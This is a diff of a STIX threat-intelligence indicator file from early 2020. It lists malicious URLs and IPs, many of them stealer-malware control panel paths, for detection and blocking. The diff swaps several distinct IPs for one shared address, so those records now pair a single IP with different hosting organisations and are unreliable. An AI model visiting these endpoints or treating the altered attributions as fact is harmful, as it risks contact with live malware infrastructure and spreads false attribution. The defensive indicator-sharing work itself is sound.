'http://samaaj.org.pk/emp/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:30.838Z"} @@ -214,7 +214,7 @@ {"created":"2020-01-29T03:00:38.721Z","description":"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:00:38.721Z","name":"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:00:38.721Z"} {"created":"2020-01-29T03:00:51.527Z","description":"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:00:51.527Z","name":"mal_url: http://corpcougar.com/me/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:00:51.527Z"} {"created":"2020-01-29T03:01:05.442Z","description":"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:05.442Z","name":"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:05.442Z"} -{"created":"2020-01-29T03:01:13.933Z","description":"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime","id":"indicator--5384d504-8760-4255-8daa-dd156dc302d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-29T03:01:13.933Z","name":"mal_ip: 78.128.76.165","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '78.128.76.165']","type":"indicator","valid_from":"2020-01-29T03:01:13.933Z"} +{"created":"2020-01-29T03:01:13.933Z","description":"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime","id":"indicator--5384d504-8760-4255-8daa-dd156dc302d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-29T03:01:13.933Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:01:13.933Z"} {"created":"2020-01-29T03:01:31.192Z","description":"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56b347c9-58c9-48d5-a015-2d561d855af2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:31.192Z","name":"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:31.192Z"} {"created":"2020-01-29T03:01:37.815Z","description":"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime","id":"indicator--840739fb-44ae-42f0-805f-422b38422325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-29T03:01:37.815Z","name":"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']","type":"indicator","valid_from":"2020-01-29T03:01:37.815Z"} {"created":"2020-01-29T03:01:49.96Z","description":"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-29T03:01:49.96Z","name":"mal_url: http://rgmechanics.fun/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rgmechanics.fun/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:01:49.96Z"} @@ -222,26 +222,26 @@ {"created":"2020-01-29T03:02:24.081Z","description":"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:24.081Z","name":"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:24.081Z"} {"created":"2020-01-29T03:02:31.573Z","description":"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--3c61c714-aab6-46e2-abfd-389628870d7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-29T03:02:31.573Z","name":"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.573Z"} {"created":"2020-01-29T03:02:31.605Z","description":"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:31.605Z","name":"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.605Z"} -{"created":"2020-01-29T03:02:41.021Z","description":"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-29T03:02:41.021Z","name":"mal_ip: 217.29.57.178","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.29.57.178']","type":"indicator","valid_from":"2020-01-29T03:02:41.021Z"} +{"created":"2020-01-29T03:02:41.021Z","description":"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-29T03:02:41.021Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:02:41.021Z"} {"created":"2020-01-29T03:02:42.284Z","description":"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-29T03:02:42.284Z","name":"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.284Z"} {"created":"2020-01-29T03:02:42.335Z","description":"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-29T03:02:42.335Z","name":"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.335Z"} {"created":"2020-01-29T03:02:42.367Z","description":"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime","id":"indicator--0005f77c-327b-4b69-8046-777efe95361d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:02:42.367Z","name":"mal_url: http://microsoftrenat.site/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://microsoftrenat.site/index.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.367Z"} {"created":"2020-01-29T03:02:48.869Z","description":"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--2ef4b932-5434-49f4-8255-a70de96893d8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:48.869Z","name":"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:48.869Z"} -{"created":"2020-01-29T03:02:48.897Z","description":"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-29T03:02:48.897Z","name":"mal_ip: 31.31.196.78","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '31.31.196.78']","type":"indicator","valid_from":"2020-01-29T03:02:48.897Z"} +{"created":"2020-01-29T03:02:48.897Z","description":"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-29T03:02:48.897Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:02:48.897Z"} {"created":"2020-01-30T02:58:32.284Z","description":"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8da10219-9eb1-4963-8889-587598e511cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-30T02:58:32.284Z","name":"mal_url: http://www.cpadeer.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://www.cpadeer.com/login']","type":"indicator","valid_from":"2020-01-30T02:58:32.284Z"} {"created":"2020-01-31T02:19:29.045Z","description":"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime","id":"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-31T02:19:29.045Z","name":"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:19:29.045Z"} {"created":"2020-01-31T02:22:09.726Z","description":"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-31T02:22:09.726Z","name":"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:22:09.726Z"} {"created":"2020-02-01T02:03:02.79Z","description":"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:02.79Z","name":"mal_url: http://marubemi.com/owen/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://marubemi.com/owen/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:02.79Z"} -{"created":"2020-02-01T02:03:07.047Z","description":"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-02-01T02:03:07.047Z","name":"mal_ip: 62.76.41.133","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '62.76.41.133']","type":"indicator","valid_from":"2020-02-01T02:03:07.047Z"} +{"created":"2020-02-01T02:03:07.047Z","description":"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-02-01T02:03:07.047Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:03:07.047Z"} {"created":"2020-02-01T02:03:48.038Z","description":"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:48.038Z","name":"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.038Z"} {"created":"2020-02-01T02:03:48.079Z","description":"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:03:48.079Z","name":"mal_url: http://farzanatradings.com/maindon/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.079Z"} {"created":"2020-02-01T02:04:16.392Z","description":"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:04:16.392Z","name":"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:16.392Z"} {"created":"2020-02-01T02:04:21.636Z","description":"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:04:21.636Z","name":"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:21.636Z"} -{"created":"2020-02-01T02:04:21.676Z","description":"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1f9e0571-119c-448a-8656-fec49c9c058a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:04:21.676Z","name":"mal_url: http://5.188.60.23/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.23/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.676Z"} +{"created":"2020-02-01T02:04:21.676Z","description":"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1f9e0571-119c-448a-8656-fec49c9c058a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:04:21.676Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.676Z"} {"created":"2020-02-01T02:04:21.705Z","description":"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--d1161e31-f661-469c-b206-84e1d416e577","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-01T02:04:21.705Z","name":"mal_url: http://gosdick.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gosdick.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.705Z"} -{"created":"2020-02-01T02:04:21.745Z","description":"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-02-01T02:04:21.745Z","name":"mal_ip: 185.22.155.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.22.155.46']","type":"indicator","valid_from":"2020-02-01T02:04:21.745Z"} +{"created":"2020-02-01T02:04:21.745Z","description":"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-02-01T02:04:21.745Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:04:21.745Z"} {"created":"2020-02-01T02:05:07.232Z","description":"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-01T02:05:07.232Z","name":"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.232Z"} -{"created":"2020-02-01T02:05:07.274Z","description":"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-01T02:05:07.274Z","name":"mal_url: http://92.63.197.156/tspir/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.156/tspir/index.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.274Z"} +{"created":"2020-02-01T02:05:07.274Z","description":"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-01T02:05:07.274Z","name":"mal_url: http://89.160.20.156/tspir/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/tspir/index.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.274Z"} {"created":"2020-02-01T02:06:07.042Z","description":"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:06:07.042Z","name":"mal_url: http://vware.duckdns.org/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vware.duckdns.org/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:07.042Z"} {"created":"2020-02-01T02:06:15.505Z","description":"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-01T02:06:15.505Z","name":"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.505Z"} {"created":"2020-02-01T02:06:15.674Z","description":"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:06:15.674Z","name":"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.674Z"} @@ -249,11 +249,11 @@ {"created":"2020-02-01T02:06:38.733Z","description":"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-01T02:06:38.733Z","name":"mal_url: http://144.202.96.212/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://144.202.96.212/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:38.733Z"} {"created":"2020-02-01T02:06:49.292Z","description":"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-01T02:06:49.292Z","name":"mal_url: http://papafrog.beget.tech/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://papafrog.beget.tech/index.php']","type":"indicator","valid_from":"2020-02-01T02:06:49.292Z"} {"created":"2020-02-01T02:07:27.633Z","description":"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:07:27.633Z","name":"mal_url: http://t917659s.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t917659s.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:07:27.633Z"} -{"created":"2020-02-01T02:07:36.513Z","description":"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime","id":"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-01T02:07:36.513Z","name":"mal_url: http://185.136.159.206/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.136.159.206/login']","type":"indicator","valid_from":"2020-02-01T02:07:36.513Z"} +{"created":"2020-02-01T02:07:36.513Z","description":"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime","id":"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-01T02:07:36.513Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:07:36.513Z"} {"created":"2020-02-01T02:08:09.833Z","description":"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:08:09.833Z","name":"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.833Z"} -{"created":"2020-02-01T02:08:09.939Z","description":"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime","id":"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-01T02:08:09.939Z","name":"mal_url: http://94.177.123.112/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.177.123.112/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.939Z"} -{"created":"2020-02-01T02:08:31.777Z","description":"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:08:31.777Z","name":"mal_ip: 47.241.1.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.241.1.46']","type":"indicator","valid_from":"2020-02-01T02:08:31.777Z"} -{"created":"2020-02-01T02:08:31.818Z","description":"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:08:31.818Z","name":"mal_ip: 